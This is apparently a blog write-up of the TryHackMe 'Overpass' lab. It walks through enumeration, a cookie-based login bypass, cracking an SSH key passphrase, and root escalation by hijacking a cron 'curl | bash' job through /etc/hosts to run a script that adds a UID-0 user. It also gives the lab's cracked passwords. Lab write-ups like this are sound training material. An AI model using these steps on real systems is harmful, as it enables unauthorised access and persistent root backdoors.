Navigating the Digital Maze: A Comprehensive Walkthrough of the…

In the vast and often treacherous landscape of cybersecurity, challenges like the Overpass room on TryHackMe serve as both a test and a learning ground. This isn't just another exercise; it's a realistic web application challenge that combines a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path.

In the vast and often treacherous landscape of cybersecurity, challenges like the Overpass room on TryHackMe serve as both a test and a learning ground. This isn’t just another exercise; it’s a realistic web application challenge that combines a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path. So, buckle up as we embark on a journey to navigate this digital maze together.

The Overpass challenge is designed for those with a basic understanding of web enumeration, SSH, and privilege escalation. It’s a Linux-based system, and while it’s classified as easy, don’t be fooled by the label. Each step requires careful attention and a methodical approach. So, let’s dive in and explore the intricacies of this challenge.

Step 1: Initial Reconnaissance with Nmap

Our journey begins with the initial reconnaissance phase, where we use Nmap to scan the target machine. This tool is a powerhouse in the world of network exploration, allowing us to identify open ports and services. The command we use is:

“`nmap -p- “`

This scan reveals two critical ports:

  • Port 22: SSH – Secure Shell, a protocol for secure remote login and other secure network services over an unsecured network.
  • Port 80: HTTP – Hypertext Transfer Protocol, the foundation of any data exchange on the Web.

The HTTP server is a Go server, but at this stage, it doesn’t appear to have any obvious vulnerabilities. This sets the stage for further enumeration.

Step 2: Web Enumeration to Discover Hidden Directories

Next, we navigate to the web server on port 80. Here, we find a simple webpage mentioning a project called “Overpass.” This is our first clue, and it’s crucial to delve deeper.

Directory Brute-Forcing with Gobuster

To uncover hidden directories, we use Gobuster, a directory brute-forcer. The command we use is:

“`gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt“`

This scan reveals the /admin directory, which contains an admin login page. This is a significant find, as it provides us with a potential entry point into the system.

Exploiting the Admin Login Page

Upon inspecting the login page, we realize that conventional login attempts won’t work. This is where things get interesting. The source code reveals two interesting files:

  • login.js – This file contains the client-side code for the login page.
  • cookie.js – This file has a vulnerability where the SessionToken cookie is not validated properly.

By using a browser extension like Cookie Editor, we can add a SessionToken with a random value. This allows us to bypass authentication and access the admin panel. Inside, we find an SSH private key for a user named James.

Step 3: Cracking the SSH Key Passphrase

The SSH key is protected with a passphrase, which we can crack using John the Ripper, a fast password cracker. The process involves two main steps:

Converting the Key to a Crackable Format

First, we convert the key to a format John can read. The command we use is:

“`ssh2john privatesshkeyfile > overpass.hash“`

Cracking the Passphrase with John the Ripper

Next, we use John to crack the passphrase. The command we use is:

“`john overpass.hash –wordlist=/usr/share/wordlists/rockyou.txt“`

After successfully cracking the passphrase “james13”, we can login to the ssh using the following command:

“`ssh -i james@“`

Once inside, we find the first flag in the user.txt file.

Bonus: Decoding James’s Hidden Password

In James’s home directory, we find a hidden file named .overpass, which contains his SSH password encoded with ROT13. Decoding it gives us the password: “saydrawnlyingpicture”. This is a classic example of how simple encoding can be a security risk if not handled properly.

Step 4: Privilege Escalation to Root

Now, it’s time to escalate our privileges. After checking SUID and running sudo -l, we decide to use LinPEAS, a script that helps us perform a thorough system enumeration. The process involves two main steps:

Downloading and Executing LinPEAS

First, we host a Python server on our attacking machine:

“`python3 -m http.server 8080“`

Then, we download and execute LinPEAS on the target machine:

“`wget /linpeas.sh
chmod +x linpeas.sh
./linpeas.sh“`

Exploiting the Cron Job

LinPEAS reveals a cron job running every minute:

“` root curl overpass.thm/downloads/src/buildscript.sh | bash“`

To exploit this, we modify the /etc/hosts file to redirect overpass.thm to our attacking machine:

“`vim /etc/hosts
overpass.thm“`

Now, we host a malicious buildscript.sh on our Python server:

“`useradd -ou 0 -g 0 newroot
echo “newroot:password” | chpasswd“`

Once the cron job runs, it will download and execute our script, creating a new root user. We can then log in with the new user and grab the root flag from the /root directory.

Conclusion

The Overpass challenge is a comprehensive exercise that tests our knowledge of web enumeration, SSH, and privilege escalation. It’s a realistic scenario that mirrors real-world vulnerabilities and exploits. By carefully following each step and understanding the underlying concepts, we can navigate this digital maze and emerge victorious.

Remember, the key to success in cybersecurity is not just about the tools we use, but also about our understanding and approach. Each challenge is an opportunity to learn and grow, so embrace the process and enjoy the journey.

FAQ

What is the Overpass challenge?

The Overpass challenge is a realistic web application challenge on TryHackMe that includes a mix of vulnerabilities such as weak passwords, exposed credentials, and a classic privilege escalation path.

What skills are required for the Overpass challenge?

The Overpass challenge requires a basic understanding of web enumeration, SSH, and privilege escalation.

What tools are used in the Overpass challenge?

The Overpass challenge involves the use of Nmap, Gobuster, John the Ripper, and LinPEAS.

How do I crack the SSH key passphrase in the Overpass challenge?

You can crack the SSH key passphrase in the Overpass challenge using John the Ripper. First, convert the key to a format John can read, then use John to crack the passphrase.

How do I exploit the cron job in the Overpass challenge?

To exploit the cron job in the Overpass challenge, modify the /etc/hosts file to redirect overpass.thm to your attacking machine. Then, host a malicious buildscript.sh on your Python server. Once the cron job runs, it will download and execute your script, creating a new root user.

What is the final goal of the Overpass challenge?

The final goal of the Overpass challenge is to escalate your privileges to root and grab the root flag from the /root directory.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

If you like this post you might also like these

back to top